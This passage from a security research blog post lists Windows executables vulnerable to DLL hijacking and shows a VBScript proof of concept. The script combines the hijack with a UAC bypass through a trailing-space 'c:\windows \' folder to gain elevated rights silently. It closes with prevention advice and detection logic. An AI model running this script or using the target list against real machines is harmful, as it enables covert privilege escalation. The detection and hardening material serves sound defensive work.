| resetengine.exe | XmlLite.dll | DllMain | :x: |
| resmon.exe | CLDAPI.dll | CfGetPlaceholderStateFromAttributeTag | :x: |
| resmon.exe | CLDAPI.dll | DllMain | :x: |
| resmon.exe | CRYPTBASE.DLL | DllMain | :x: |
| resmon.exe | edputil.dll | DllMain | :x: |
| resmon.exe | edputil.dll | EdpGetIsManaged | :x: |
| resmon.exe | FLTLIB.DLL | DllMain | :x: |
| resmon.exe | PROPSYS.dll | DllMain | :x: |
| resmon.exe | PROPSYS.dll | PSCreateMemoryPropertyStore | :x: |
| resmon.exe | PROPSYS.dll | PSPropertyBag_WriteDWORD | :x: |
| rmactivate_isv.exe | msdrm.dll | __AddMachineCertToLicenseStore | :x: |
| rmactivate_isv.exe | msdrm.dll | DllMain | :x: |
| rmactivate_ssp_isv.exe | CRYPTBASE.dll | DllMain | :x: |
| rmactivate_ssp_isv.exe | CRYPTBASE.dll | SystemFunction036 | :x: |
| rmactivate.exe | CRYPTBASE.dll | DllMain | :x: |
| rmactivate.exe | CRYPTBASE.dll | SystemFunction036 | :x: |
| rmactivate.exe | msdrm.dll | __AddMachineCertToLicenseStore | :x: |
| rmactivate.exe | msdrm.dll | DllMain | :x: |
| rmttpmvscmgrsvr.exe | DEVOBJ.dll | DllMain | :x: |
| route.exe | IPHLPAPI.DLL | DllMain | :x: |
| rpcping.exe | credui.dll | DllMain | :x: |
| rpcping.exe | SspiCli.dll | DllMain | :x: |
| rpcping.exe | WINHTTP.dll | DllMain | :x: |
| rwinsta.exe | logoncli.dll | DllMain | :x: |
| rwinsta.exe | netutils.dll | DllMain | :x: |
| rwinsta.exe | samcli.dll | DllMain | :x: |
| rwinsta.exe | srvcli.dll | DllMain | :x: |
| rwinsta.exe | utildll.dll | DllMain | :x: |
| rwinsta.exe | WINSTA.dll | DllMain | :x: |
| searchfilterhost.exe | TQUERY.DLL | DllMain | :x: |
| secedit.exe | SCECLI.dll | DllMain | :x: |
| securityhealthservice.exe | DNSAPI.dll | DllMain | :x: |
| securityhealthservice.exe | FirewallAPI.dll | DllMain | :x: |
| securityhealthservice.exe | fwbase.dll | DllMain | :x: |
| securityhealthservice.exe | fwbase.dll | FwCriticalSectionCreate | :x: |
| securityhealthservice.exe | fwbase.dll | FwCriticalSectionDestroy | :x: |
| securityhealthservice.exe | USERENV.dll | DllMain | :x: |
| securityhealthservice.exe | Wldp.dll | DllMain | :x: |
| securityhealthservice.exe | WTSAPI32.dll | DllMain | :x: |
| settingsynchost.exe | policymanager.dll | DllMain | :x: |
| settingsynchost.exe | PROPSYS.dll | DllMain | :x: |
| settingsynchost.exe | USERENV.dll | DllMain | :x: |
| setupugc.exe | dbgcore.DLL | DllMain | :x: |
| setupugc.exe | DNSAPI.dll | DllMain | :x: |
setupugc.exe
WDSCORE.dll
ConstructPartialMsgVW
:x:
setupugc.exe
WDSCORE.dll
CurrentIP
:x:
setupugc.exe
WDSCORE.dll
DllMain
:x:
setupugc.exe
WDSCORE.dll
WdsSetupLogDestroy
:x:
setupugc.exe
WDSCORE.dll
WdsSetupLogInit
:x:
setupugc.exe
WDSCORE.dll
WdsSetupLogMessageW
:x:
shutdown.exe
SspiCli.dll
DllMain
:x:
slidetoshutdown.exe
d3d10warp.dll
DllMain
:x:
slidetoshutdown.exe
d3d10warp.dll
OpenAdapter10_2
:x:
slui.exe
CLDAPI.dll
CfGetPlaceholderStateFromAttributeTag
:x:
slui.exe
CLDAPI.dll
DllMain
:x:
slui.exe
CRYPTBASE.DLL
DllMain
:x:
slui.exe
edputil.dll
DllMain
:x:
slui.exe
edputil.dll
EdpGetIsManaged
:x:
slui.exe
FLTLIB.DLL
DllMain
:x:
slui.exe
PROPSYS.dll
DllMain
:x:
slui.exe
PROPSYS.dll
PSCreateMemoryPropertyStore
:x:
slui.exe
PROPSYS.dll
PSPropertyBag_WriteDWORD
:x:
slui.exe
sppc.dll
DllMain
:x:
slui.exe
WINBRAND.dll
DllMain
:x:
slui.exe
WTSAPI32.dll
DllMain
:x:
spaceagent.exe
NETUTILS.DLL
DllMain
:x:
spaceagent.exe
SRVCLI.DLL
DllMain
:x:
spectrum.exe
SpectrumSyncClient.dll
DllMain
:x:
spoolsv.exe
DNSAPI.dll
DllMain
:x:
sppextcomobj.exe
adsldpc.dll
DllMain
:x:
sppextcomobj.exe
CRYPTBASE.dll
DllMain
:x:
sppextcomobj.exe
CRYPTBASE.dll
SystemFunction036
:x:
sppextcomobj.exe
DNSAPI.dll
DllMain
:x:
sppsvc.exe
CRYPTXML.dll
DllMain
:x:
sppsvc.exe
webservices.dll
DllMain
:x:
sppsvc.exe
XmlLite.dll
DllMain
:x:
srtasks.exe
bcd.dll
DllMain
:x:
srtasks.exe
ktmw32.dll
DllMain
:x:
srtasks.exe
SPP.dll
DllMain
:x:
srtasks.exe
SRCLIENT.dll
DllMain
:x:
srtasks.exe
SRCORE.dll
DllMain
:x:
srtasks.exe
VSSAPI.DLL
DllMain
:x:
srtasks.exe
VssTrace.DLL
DllMain
:x:
srtasks.exe
wer.dll
DllMain
:x:
stordiag.exe
CRYPTBASE.dll
DllMain
:x:
stordiag.exe
CRYPTBASE.dll
SystemFunction036
:x:
synchost.exe
PROPSYS.dll
DllMain
:x:
sysreseterr.exe
WDSCORE.dll
DllMain
:x:
systeminfo.exe
SspiCli.dll
DllMain
:x:
tabcal.exe
DEVOBJ.dll
DevObjCreateDeviceInfoList
:x:
tabcal.exe
DEVOBJ.dll
DevObjDestroyDeviceInfoList
:x:
tabcal.exe
DEVOBJ.dll
DevObjEnumDeviceInfo
:x:
tabcal.exe
DEVOBJ.dll
DevObjEnumDeviceInterfaces
:x:
tabcal.exe
DEVOBJ.dll
DevObjGetClassDevs
:x:
tabcal.exe
DEVOBJ.dll
DevObjGetDeviceInfoListDetail
:x:
tabcal.exe
DEVOBJ.dll
DevObjGetDeviceInterfaceDetail
:x:
tabcal.exe
DEVOBJ.dll
DllMain
:x:
tabcal.exe
HID.DLL
DllMain
:x:
tabcal.exe
HID.DLL
HidD_GetHidGuid
:x:
tabcal.exe
NInput.dll
DllMain
:x:
takeown.exe
SspiCli.dll
DllMain
:x:
tapiunattend.exe
WDSCORE.dll
ConstructPartialMsgVW
:x:
tapiunattend.exe
WDSCORE.dll
CurrentIP
:x:
tapiunattend.exe
WDSCORE.dll
DllMain
:x:
tapiunattend.exe
WDSCORE.dll
WdsSetupLogMessageW
:x:
tar.exe
archiveint.dll
archive_match_new
:x:
tar.exe
archiveint.dll
DllMain
:x:
taskkill.exe
dbghelp.dll
DllMain
:x:
taskkill.exe
netutils.dll
DllMain
:x:
taskkill.exe
srvcli.dll
DllMain
:x:
taskkill.exe
SspiCli.dll
DllMain
:x:
tasklist.exe
dbghelp.dll
DllMain
:x:
tasklist.exe
netutils.dll
DllMain
:x:
tasklist.exe
srvcli.dll
DllMain
:x:
tasklist.exe
SspiCli.dll
DllMain
:x:
tieringengineservice.exe
CLUSAPI.dll
DllMain
:x:
tieringengineservice.exe
DNSAPI.dll
DllMain
:x:
tieringengineservice.exe
ESENT.dll
DllMain
:x:
tracert.exe
IPHLPAPI.DLL
DllMain
:x:
tscon.exe
logoncli.dll
DllMain
:x:
tscon.exe
netutils.dll
DllMain
:x:
tscon.exe
samcli.dll
DllMain
:x:
tscon.exe
srvcli.dll
DllMain
:x:
tscon.exe
utildll.dll
DllMain
:x:
tscon.exe
WINSTA.dll
DllMain
:x:
tsdiscon.exe
WINSTA.dll
DllMain
:x:
tsdiscon.exe
WINSTA.dll
WinStationNameFromLogonIdW
:x:
tskill.exe
logoncli.dll
DllMain
:x:
tskill.exe
netutils.dll
DllMain
:x:
tskill.exe
samcli.dll
DllMain
:x:
tskill.exe
srvcli.dll
DllMain
:x:
tskill.exe
utildll.dll
DllMain
:x:
tskill.exe
WINSTA.dll
DllMain
:x:
tttracer.exe
TTDRecord.dll
DllMain
:x:
tttracer.exe
USERENV.dll
DllMain
:x:
typeperf.exe
pdh.dll
DllMain
:x:
tzsync.exe
CRYPTBASE.dll
DllMain
:x:
tzsync.exe
CRYPTBASE.dll
SystemFunction036
:x:
uevappmonitor.exe
CRYPTBASE.dll
DllMain
:x:
uevappmonitor.exe
CRYPTBASE.dll
SystemFunction036
:x:
unlodctr.exe
loadperf.dll
DllMain
:x:
upfc.exe
XmlLite.dll
DllMain
:x:
upgraderesultsui.exe
DMCmnUtils.dll
DllMain
:x:
useraccountcontrolsettings.exe
CRYPTBASE.dll
DllMain
:x:
useraccountcontrolsettings.exe
CRYPTBASE.dll
SystemFunction036
:x:
usocoreworker.exe
Cabinet.dll
DllMain
:x:
usocoreworker.exe
DMCmnUtils.dll
DllMain
:x:
usocoreworker.exe
dmiso8601utils.dll
DllMain
:x:
usocoreworker.exe
DMOleAutUtils.dll
DllMain
:x:
usocoreworker.exe
iri.dll
DllMain
:x:
usocoreworker.exe
omadmapi.dll
DllMain
:x:
usocoreworker.exe
UpdatePolicy.dll
DllMain
:x:
usocoreworker.exe
XmlLite.dll
DllMain
:x:
utcdecoderhost.exe
USERENV.dll
DllMain
:x:
utilman.exe
OLEACC.dll
DllMain
:x:
vaultcmd.exe
VAULTCLI.dll
DllMain
:x:
vds.exe
ATL.DLL
AtlModuleInit
:x:
vds.exe
ATL.DLL
AtlModuleTerm
:x:
vds.exe
ATL.DLL
DllMain
:x:
vds.exe
bcd.dll
DllMain
:x:
vds.exe
OSUNINST.dll
DllMain
:x:
vdsldr.exe
ATL.DLL
AtlModuleInit
:x:
vdsldr.exe
ATL.DLL
AtlModuleRegisterClassObjects
:x:
vdsldr.exe
ATL.DLL
DllMain
:x:
vdsldr.exe
bcd.dll
DllMain
:x:
vssadmin.exe
ATL.DLL
DllMain
:x:
vssadmin.exe
VSSAPI.DLL
DllMain
:x:
vssadmin.exe
VssTrace.DLL
DllMain
:x:
vssadmin.exe
VssTrace.DLL
VssGetTracingContextPerThread
:x:
vssadmin.exe
VssTrace.DLL
VssIsTracingEnabled
:x:
vssadmin.exe
VssTrace.DLL
VssSetTracingContextPerThread
:x:
vssadmin.exe
VssTrace.DLL
VssTraceInitialize
:x:
vssadmin.exe
VssTrace.DLL
VssTraceUninitialize
:x:
vssvc.exe
AUTHZ.dll
DllMain
:x:
vssvc.exe
bcd.dll
DllMain
:x:
vssvc.exe
DEVOBJ.dll
DllMain
:x:
vssvc.exe
FLTLIB.DLL
DllMain
:x:
vssvc.exe
VirtDisk.dll
DllMain
:x:
vssvc.exe
VSSAPI.DLL
DllMain
:x:
vssvc.exe
VssTrace.DLL
DllMain
:x:
vssvc.exe
VssTrace.DLL
VssGetTracingContextPerThread
:x:
vssvc.exe
VssTrace.DLL
VssIsTracingEnabled
:x:
vssvc.exe
VssTrace.DLL
VssSetTracingContextPerThread
:x:
vssvc.exe
VssTrace.DLL
VssTraceInitialize
:x:
vssvc.exe
VssTrace.DLL
VssTraceUninitialize
:x:
w32tm.exe
IPHLPAPI.DLL
DllMain
:x:
w32tm.exe
logoncli.dll
DllMain
:x:
w32tm.exe
netutils.dll
DllMain
:x:
w32tm.exe
NTDSAPI.dll
DllMain
:x:
waitfor.exe
netutils.dll
DllMain
:x:
waitfor.exe
srvcli.dll
DllMain
:x:
waitfor.exe
SspiCli.dll
DllMain
:x:
wbadmin.exe
credui.dll
DllMain
:x:
wbengine.exe
bcd.dll
DllMain
:x:
wbengine.exe
CLUSAPI.dll
DllMain
:x:
wbengine.exe
DNSAPI.dll
DllMain
:x:
wbengine.exe
FLTLIB.DLL
DllMain
:x:
wbengine.exe
NETUTILS.DLL
DllMain
:x:
wbengine.exe
SPP.dll
DllMain
:x:
wbengine.exe
SRVCLI.DLL
DllMain
:x:
wbengine.exe
VirtDisk.dll
DllMain
:x:
wbengine.exe
VSSAPI.DLL
DllMain
:x:
wbengine.exe
VssTrace.DLL
DllMain
:x:
wbengine.exe
wer.dll
DllMain
:x:
wbengine.exe
XmlLite.dll
DllMain
:x:
wecutil.exe
WecApi.dll
DllMain
:x:
wecutil.exe
wevtapi.dll
DllMain
:x:
werfault.exe
dbgcore.DLL
DllMain
:x:
werfault.exe
faultrep.dll
DllMain
:x:
werfault.exe
wer.dll
DllMain
:x:
werfault.exe
wer.dll
WerpSetExitListeners
:x:
werfaultsecure.exe
dbgcore.DLL
DllMain
:x:
werfaultsecure.exe
faultrep.dll
DllMain
:x:
werfaultsecure.exe
wer.dll
DllMain
:x:
werfaultsecure.exe
wer.dll
WerpSetExitListeners
:x:
wermgr.exe
wer.dll
DllMain
:x:
wermgr.exe
wer.dll
WerpSetExitListeners
:x:
wextract.exe
Cabinet.dll
DllMain
:x:
wfs.exe
ATL.DLL
DllMain
:x:
wfs.exe
credui.dll
DllMain
:x:
wfs.exe
IPHLPAPI.DLL
DllMain
:x:
wfs.exe
PROPSYS.dll
DllMain
:x:
wfs.exe
UxTheme.dll
DllMain
:x:
whoami.exe
AUTHZ.dll
DllMain
:x:
whoami.exe
netutils.dll
DllMain
:x:
whoami.exe
SspiCli.dll
DllMain
:x:
whoami.exe
wkscli.dll
DllMain
:x:
wiaacmgr.exe
ScanSetting.DLL
DllMain
:x:
wiaacmgr.exe
UxTheme.dll
DllMain
:x:
wiawow64.exe
ScanSetting.DLL
DllMain
:x:
wiawow64.exe
UxTheme.dll
DllMain
:x:
wifitask.exe
HTTPAPI.dll
DllMain
:x:
wifitask.exe
IPHLPAPI.DLL
DllMain
:x:
wifitask.exe
webservices.dll
DllMain
:x:
wifitask.exe
wlanapi.dll
DllMain
:x:
wimserv.exe
Cabinet.dll
DllMain
:x:
winlogon.exe
UXINIT.dll
DllMain
:x:
winlogon.exe
UXINIT.dll
ThemesOnTerminateSession
:x:
winrs.exe
DSROLE.dll
DllMain
:x:
winrs.exe
mi.dll
DllMain
:x:
winrs.exe
miutils.dll
DllMain
:x:
wkspbroker.exe
credui.dll
DllMain
:x:
wkspbroker.exe
DNSAPI.dll
DllMain
:x:
wkspbroker.exe
ktmw32.dll
DllMain
:x:
wkspbroker.exe
PROPSYS.dll
DllMain
:x:
wkspbroker.exe
RADCUI.dll
DllMain
:x:
wkspbroker.exe
SspiCli.dll
DllMain
:x:
wkspbroker.exe
tsworkspace.dll
DllMain
:x:
wkspbroker.exe
WINHTTP.dll
DllMain
:x:
wkspbroker.exe
WININET.dll
DllMain
:x:
wksprt.exe
webservices.dll
DllMain
:x:
wksprt.exe
WININET.dll
DllMain
:x:
wlrmdr.exe
SspiCli.dll
DllMain
:x:
wmpdmc.exe
dwmapi.dll
DllMain
:x:
wmpdmc.exe
OLEACC.dll
DllMain
:x:
wmpdmc.exe
UxTheme.dll
DllMain
:x:
wmpdmc.exe
WindowsCodecs.dll
DllMain
:x:
wmpdmc.exe
wmpdui.dll
DllMain
:x:
workfolders.exe
CLDAPI.dll
CfGetPlaceholderStateFromAttributeTag
:x:
workfolders.exe
CLDAPI.dll
DllMain
:x:
workfolders.exe
CRYPTBASE.DLL
DllMain
:x:
workfolders.exe
DEVOBJ.dll
DllMain
:x:
workfolders.exe
dmEnrollEngine.DLL
DllMain
:x:
workfolders.exe
edputil.dll
DllMain
:x:
workfolders.exe
edputil.dll
EdpGetIsManaged
:x:
workfolders.exe
FLTLIB.DLL
DllMain
:x:
workfolders.exe
policymanager.dll
DllMain
:x:
workfolders.exe
PROPSYS.dll
DllMain
:x:
workfolders.exe
PROPSYS.dll
PSCreateMemoryPropertyStore
:x:
workfolders.exe
PROPSYS.dll
PSPropertyBag_WriteDWORD
:x:
workfolders.exe
USERENV.dll
DllMain
:x:
workfolders.exe
USERENV.dll
GetProfileType
:x:
wowreg32.exe
devrtl.DLL
DllMain
:x:
wpcmon.exe
samcli.dll
DllMain
:x:
wpcmon.exe
USERENV.dll
DllMain
:x:
wpnpinst.exe
Cabinet.dll
DllMain
:x:
wpnpinst.exe
IPHLPAPI.DLL
DllMain
:x:
wpnpinst.exe
PROPSYS.dll
DllMain
:x:
wpr.exe
WindowsPerformanceRecorderControl.dll
DllMain
:x:
write.exe
CLDAPI.dll
CfGetPlaceholderStateFromAttributeTag
:x:
write.exe
CLDAPI.dll
DllMain
:x:
write.exe
CRYPTBASE.DLL
DllMain
:x:
write.exe
edputil.dll
DllMain
:x:
write.exe
edputil.dll
EdpGetIsManaged
:x:
write.exe
FLTLIB.DLL
DllMain
:x:
write.exe
PROPSYS.dll
DllMain
:x:
write.exe
PROPSYS.dll
PSCreateMemoryPropertyStore
:x:
write.exe
PROPSYS.dll
PSPropertyBag_WriteDWORD
:x:
wscadminui.exe
CRYPTBASE.DLL
DllMain
:x:
wsmanhttpconfig.exe
DSROLE.dll
DllMain
:x:
wsmanhttpconfig.exe
HTTPAPI.dll
DllMain
:x:
wsmanhttpconfig.exe
HTTPAPI.dll
HttpInitialize
:x:
wsmanhttpconfig.exe
HTTPAPI.dll
HttpTerminate
:x:
wsmanhttpconfig.exe
mi.dll
DllMain
:x:
wsmanhttpconfig.exe
miutils.dll
DllMain
:x:
wsmprovhost.exe
DSROLE.dll
DllMain
:x:
wsmprovhost.exe
mi.dll
DllMain
:x:
wsmprovhost.exe
miutils.dll
DllMain
Some caveats:
- The test was performed by simply running each executable, without specifying any parameters and with no further user interaction. This explains why the well-documented xwizard.exe DLL hijack [ 15 ] is not present in this list, because it requires two (arbitrary) arguments for it to work.
- Some applications come with a GUI, or some other visual element that gives away the binary was executed. This also includes error messages: required DLLs might be missing, and the hijacked DLL obviously lacks the original functionality. Attackers are less likely to target such applications for DLL hijacking purposes.
- DLLs of which the original version was written in C++ have not been taken into account.
A CSV version of the full list can be found on GitHub [ 14 ].
Combining with UAC bypass
Having found all these executables, at most this allows us to execute code through trusted programs. However, it is also possible to gain elevated rights if used in conjunction with UAC Bypass techniques.
User Account Control (UAC) [ 16 ] was introduced in Windows Vista as a security feature, asking users for confirmation through a prompt before a process running under normal privileges is elevated to higher privileges. After users complained about getting flooded with UAC prompts when doing arbitrary tasks, Microsoft introduced auto elevation in Windows 7, which automatically elevates certain processes if they are located in trusted directories (such as c:\windows\system32).
With this in mind, you could try running arbitrary code with elevated privileges by using an executable that is marked for auto elevation that is also vulnerable to DLL hijacking. There are about 35 such executables, as can be seen in the previous section. The problem to overcome is that of the trusted directory: both the auto-elevate executable and the custom DLL need to be located in a trusted directory, but none of these are user-writable.
There is some excellent research about bypassing UAC out there - one of my favourite techniques is the mocking of trusted directories using trailing spaces [ 17 ]. I would recommend reading the full blog post, but it boils down to users being able to create c:\windows \system32\ (note the space after the first folder), and auto-elevate executables placed in this folder consider this a trusted location.
It is debatable whether this is a proper security vulnerability - Microsoft argue it is not [ 18 ], but it is at least a flaw, given that most (non-enterprise) Windows computers are using ‘administrator accounts’ by default.
Either way, this provides us with an excellent means through which DLL hijacking can be made much more powerful. Note that folders with trailing spaces cannot be created through traditional means on Windows. You could compile some lines of C to do this, as is done by the original researcher, but it turns out VBScript can actually do this for us too. The following proof-of-concept shows that with only a few lines of code you can get this to work:
Set oFSO = CreateObject("Scripting.FileSystemObject")
Set wshshell = wscript.createobject("WScript.Shell")
' Get target binary and payload
WScript.StdOut.Write("System32 binary: ")
strBinary = WScript.StdIn.ReadLine()
WScript.StdOut.Write("Path to your DLL: ")
strDLL = WScript.StdIn.ReadLine()
' Create folders
Const target = "c:\windows \"
target_sys32 = (target & "system32\")
target_binary = (target_sys32 & strBinary)
If Not oFSO.FolderExists(target) Then oFSO.CreateFolder target End If
If Not oFSO.FolderExists(target_sys32) Then oFSO.CreateFolder target_sys32 End If
' Copy legit binary and evil DLL
oFSO.CopyFile ("c:\windows\system32\" & strBinary), target_binary
oFSO.CopyFile strDLL, target_sys32
' Run, Forrest, Run!
wshshell.Run("""" & target_binary & """")
' Clean files
WScript.StdOut.Write("Clean up? (press enter to continue)")
WScript.StdIn.ReadLine()
wshshell.Run("powershell /c ""rm -r """"\\?\" & target & """""""") 'Deletion using VBScript is problematic, use PowerShell instead
The screenshot below shows what execution of the script might look like.
An example showing an elevated prompt after a malicious dxgi.dll was loaded by a legitimate winsat.exe from a mocked trusted directory, without getting any UAC prompts.
In the table above, all executable/DLL combinations for which the auto elevation was successful are marked in the first column. With over 160 possible combinations, there are quite a few options.
Prevention and detection
A simple way to prevent DLL hijacking from happening would be for applications to always use absolute paths instead of relative ones. Although some applications (notably portable ones) will not always be able to do so, applications located in \system32\ and relying on DLLs in the same folder have no excuse for doing otherwise. The better option, which only very few Windows executables seem to do, is to verify all DLLs before loading them (e.g. by checking their signatures) - this would largely eliminate the problem.
Nevertheless, as we have seen, attackers will still be able to bring older versions of legitimate/trusted applications that can be exploited. So even if every application starts checking its DLLs before loading them from now on, we would still have to deal with this problem.
Let’s therefore focus on detection. You could hunt for the creation or loading of any of the DLLs mentioned before from unexpected paths, particularly in temp locations such as %appdata%. After all, the name of the (legitimate) application loading the DLLs can be changed, but the filenames of DLLs are always fixed. A sample Sigma rule for this can be found here [ 19 ] - it successfully detects our DLL hijacking, although as you can see, it doesn’t scale very well and is likely to be prone to false positives. You could take a more generic approach by looking for the presence of Microsoft-signed binaries in unexpected locations, or the loading of DLLs from unexpected locations by such Microsoft-signed binaries (regardless of location).
Finally, the demonstrated UAC bypass technique can be detected easily and reliably by looking for any activity in the /windows / folder, or in any folders ending in a space for that matter. As described before, Windows folders with trailing spaces cannot be created through normal means and should therefore be rare, and always suspicious. Setting your UAC mode to ‘Always notify’, one level higher than the default, will prevent this and other similar UAC bypass techniques from succeeding.
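The two hunts described above (watched DLLs loaded from unexpected paths, and any activity in a folder whose name ends in a space) can be sketched as follows. This is an added example, not code from the original post: the event records are constructed, the field names are those of Sysmon Event ID 7 (Image, ImageLoaded), and the short watch list and the set of expected directories are assumptions.

```python
# Added example: hunting logic over constructed Sysmon-style image-load events.
# Field names follow Sysmon Event ID 7 (Image, ImageLoaded); the data is constructed.

# Small sample of DLL names from the post's list; a real watch list would be
# built from the full CSV the post links to.
WATCHED_DLLS = {"dxgi.dll", "cryptbase.dll", "wtsapi32.dll", "propsys.dll"}

# Assumption: directories where these system DLLs are expected to live.
EXPECTED_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}


def split_path(path):
    """Split a Windows path into components without trimming whitespace."""
    if path.startswith("\\\\?\\"):          # drop the \\?\ long-path prefix
        path = path[4:]
    return [p for p in path.replace("/", "\\").split("\\") if p]


def trailing_space_dirs(path):
    """Return the directory components of `path` that end in a space."""
    return [p for p in split_path(path)[:-1] if p != p.rstrip(" ")]


def unexpected_dll_load(event):
    """True if a watched DLL was loaded from outside the expected directories."""
    parts = split_path(event["ImageLoaded"])
    dll_name = parts[-1].lower()
    dll_dir = "\\".join(parts[:-1]).lower()  # exact compare, spaces preserved
    return dll_name in WATCHED_DLLS and dll_dir not in EXPECTED_DIRS


def triage(event):
    """Return the list of findings for one image-load event (empty if clean)."""
    findings = []
    for field in ("Image", "ImageLoaded"):
        if trailing_space_dirs(event[field]):
            findings.append(f"trailing-space directory in {field}")
    if unexpected_dll_load(event):
        findings.append("watched DLL loaded from unexpected path")
    return findings


# Constructed events: normal load, mocked trusted directory, %appdata% copy,
# and an unrelated application whose folder name merely contains a space.
EVENTS = [
    {"Image": r"c:\windows\system32\winsat.exe",
     "ImageLoaded": r"c:\windows\system32\dxgi.dll"},
    {"Image": r"c:\windows \system32\winsat.exe",
     "ImageLoaded": r"c:\windows \system32\dxgi.dll"},
    {"Image": r"C:\Users\alice\AppData\Roaming\rekeywiz.exe",
     "ImageLoaded": r"C:\Users\alice\AppData\Roaming\CRYPTBASE.dll"},
    {"Image": r"C:\Program Files\Vendor App\app.exe",
     "ImageLoaded": r"C:\Program Files\Vendor App\helper.dll"},
]

if __name__ == "__main__":
    for ev in EVENTS:
        print(ev["ImageLoaded"], "->", triage(ev) or "ok")
```

The directory comparison is done on the raw string, because trimming or normalising whitespace before the check would make the mocked directory look identical to the real one.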
Posted on 2020-06-22